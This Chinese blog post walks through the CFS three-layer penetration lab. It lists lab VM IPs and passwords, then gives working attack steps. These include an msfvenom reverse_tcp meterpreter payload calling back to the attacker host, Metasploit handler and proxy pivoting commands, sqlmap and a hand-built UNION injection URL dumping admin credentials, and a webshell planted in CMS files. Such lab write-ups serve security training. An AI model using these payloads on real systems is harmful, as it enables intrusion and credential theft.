当前位置: 首页 > news >正文

CFS三层靶机-内网渗透

靶场搭建

1.靶场下载地址

链接:https://pan.baidu.com/s/1-4H17E9pGz5EbnFgQp-ZEw?pwd=bull
提取码:bull

2.网卡配置

先在vmvare虚拟机的虚拟网络编辑器添加两张网卡用来搭建网络环境,我这里直接就是5网卡对应56网段,6网卡对应65网卡。

kali改为桥接模式(也可改为net,)

CentOS 7第一张网卡桥接(或net),第二章网卡配置5网卡

Ubuntu配置5和6网卡

win7配置6网卡

3.宝塔设置

在CentOS和Ubuntu这里都有详细信息,宝塔后台登录地址换上自己虚拟机对应的ip即可访问成功

将CentOS的IP添加进去

Ubuntu也同上

环境配置到此完成

kali:
IP:192.168.178.128
centos7:
root密码:teamssix.com此主机的IP地址:
192.168.178.129
192.168.55.128宝塔后台登陆地址及密码:
地址:http://192.168.178.129:8888/a768f109/
账号:eaj3yhsl
密码:41bb8fee------------------------------------------------------------------------------------
Ubuntu:
root密码:teamssix.com此主机的IP地址:
192.168.55.129
192.168.66.128宝塔后台登陆地址及密码:
地址:http://192.168.66.128:8888/2cc52ec0/
账号:xdynr37d
密码:123qwe..
---------------------------------------------------------------------------------、
win7:
Administrator密码:teamssix.com此主机的IP地址:
192.168.66.198

环境搭建完成之后,kali可以ping通Centos,Centos可以ping通Ubuntu,Ubuntu可以ping通win7

渗透测试

一、Centos7

信息收集

端口扫描

nmap -p- -sV -sS 192.168.178.129

访问80端口

目录扫描

dirsearch -u "192.168.178.129"

访问robots.txt获取到第一个flag

获取webshell

这是thinkphp5的网站,直接拿工具测

蚁剑直接连,获取到第二个flag

查看一下Centos的信息发现还有一个55的网段

获取主机权限

利用msf生成文件,并且通过蚁剑进行上传

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.178.128 LPORT=4444 -f elf>4444.elf

更改文件权限

chmod 777 4444.elf

(在kali里面操作)msf生成后门

msfconsole                                      #开启msf
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
show options                                    #可以查看一下写的内容
set lhost 192.168.178.128                       #ip写kali的
set lport 4444                                  #监听端口
run                                             #启动

回到蚁剑执行4444.elf文件

./4444.elf

msf成功连接

二、Ubuntu

信息收集
run autoroute -p    #查看路由信息
run post/multi/manage/autoroute   #自动添加路由
background   
route print   #打印路由

现在msf有了55段的路由

msf代理配置
use auxiliary/server/socks_proxy
show options
set srvhost 0.0.0.0
set srvport 1080
run

进入 /etc/proxychains4.conf 更改代理配置,保存并且退出

vim /etc/proxychains4.conf(kali的IP)

扫描55段的IP

proxychains nmap -sT -Pn 192.168.55.1/24 -p80 
proxychains nmap -Pn -sT 192.168.55.129

webshell

访问80端口

查看源码,提示 SQL 注入点

访问注入点

sqlmap扫描

proxychains sqlmap -u “http://192.168.55.129/index.php?r=vul&keyword=1” --dbsproxychains sqlmap -u “http://192.168.55.129/index.php?r=vul&keyword=1” -p keyword -D bagecms –tablesproxychains sqlmap -u “http://192.168.55.129/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columnsproxychains sqlmap -u “http://192.168.55.129/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin -C username,password –dump注意:socks代理不稳定,用sqlmap跑就会断开,显示超时

手工注入获取账号和密码

http://192.168.55.129/index.php?r=vul&keyword=1%27%20union%20select%20group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20bage_admin--+

进行解密

扫描一下网站下的目录,发现一个文件robots.txt

访问后台网站

使用账号和密码进行登录,登录成功发现第三个flag

登录后发现网站使用了很多模块化文件。而且都是php文件格式,我们直接在其中的一个php文件中写入一句话木马,然后用蚁剑连接,注意这里的网址使用的是模块化,不能直接加在网站上,要用?r=模块文件的方式访问模块文件,再用蚁剑连接.

连接成功后就可以发现第四个flag

后面第三台主机win7同理

这个靶场一共有5个flag

http://www.dtcms.com/a/461079.html

相关文章:

  • 【智慧城市】2025年中国地质大学(武汉)暑期实训优秀作品(6):武汉视界
  • Redis的缓存更新策略
  • MarsEdit 5 for Mac 博客博文编辑管理工具
  • 蒙古语网站建设江西省飞宏建设工程有限公司 网站
  • 智能监控项目:Python 多目标检测系统 目标检测 目标跟踪(YOLOv8+ByteTrack 监控/交通 源码+文档)✅
  • 分布式光纤传感:照亮每一个角落的“温度感知神经”
  • 实测Triton-Copilot:AI如何助力高性能算子开发
  • 泰州网站专业制作能免费做片头的网站
  • 京东获取整站实时商品详情数据|商品标题|数据分析提取教程
  • 【Linux探索学习】第一篇Linux的基本指令(2)——开启Linux学习第二篇
  • Redisson 看门狗机制深度解析:分布式锁的守护者
  • 非预置应用使用platform签名并且添加了android.uid.system无法adb安装解决方法
  • 分布式光纤声波振动传感:守护智慧城市燃气管网安全的 “神经末梢”
  • Hadoop 3.3.5 伪分布式安装配置的完整过程
  • 郑州市中原区建设局网站南京市建设工程档案馆网站
  • Oracle PL/SQL Developer v16的安装以及导出导入表数据
  • 消防管理系统如何重构现代空间防御体系
  • Coze源码分析-资源库-编辑数据库-后端源码-流程/技术/总结
  • Linux之lvm存储卷管理篇
  • 数字大健康浪潮下:智能设备重构人力生态,传统技艺如何新生?
  • 郑州陆港开发建设有限公司网站西安有哪些家做网站的公司
  • 整体设计 逻辑系统程序 之19 内核层最大资本箱为核心的完整设计讨论— 含分层架构、CNN 数据处理支撑、监督闭环与多场景交付物
  • GPT系列模型-详解
  • 【pytest 】 pytest 生命周期
  • DMAIC各个阶段用到的图
  • 企业网站建设 网络服务dedecms网站后台模板修改
  • 国外网站开发现状毕业设计做网站教程
  • 【鸿蒙心迹】参加ICT大赛对我的影响和帮助
  • 从轮询到实时推送:将站内消息接口改造为 WebSocket 服务
  • 海口小微企业网站建设公司注册写10万还是50万好